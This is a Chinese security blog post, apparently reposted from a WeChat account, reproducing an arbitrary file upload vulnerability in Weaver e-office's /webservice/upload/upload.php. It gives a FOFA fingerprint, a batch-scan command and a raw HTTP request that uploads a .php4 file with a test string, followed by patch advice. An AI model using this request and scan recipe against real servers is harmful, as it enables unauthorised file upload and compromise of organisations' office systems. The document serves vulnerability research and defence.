SCA御盾实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
泛微e-office是一款功能强大的协同办公系统,旨在为企业和组织提供高效、便捷的办公环境。该系统以其智能化、平台化和全程电子化的特点,受到了众多用户的青睐。泛微e-office具备丰富的业务场景应用,可以满足人事、行政、财务、销售、运营、市场等不同部门的协作需求。通过一键导入各类表单模板、流程模板等功能,用户可以快速实现费控管理、合同管理、订单管理、项目管理等办公目标。同时,系统还提供了个性应用可视化构建的功能,用户无需代码基础,即可像搭积木一样完成新应用的构建,轻松应对各种管理场景。
app="泛微-EOffice"
python3 main.py -f url.txt -p weaver-eoffice-webservice-file-upload
POST /webservice/upload/upload.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflate, brContent-Type:multipart/form-data; boundary=--------------------------553898708333958420021355----------------------------553898708333958420021355Content-Disposition: form-data; name="file"; filename="qq_test.php4"Content-Type: application/octet-streamqqtest----------------------------553898708333958420021355--
漏洞批量扫描脚本与poc发布在知识星球
1、限制webservice接口的访问
2、升级泛微eoffice至最新版本
3、官网下载最新补丁版本:https://www.weaver.com.cn/
无
原文始发于微信公众号(SCA御盾):【漏洞复现】泛微-eoffice-webservice-file-upload任意文件上传漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论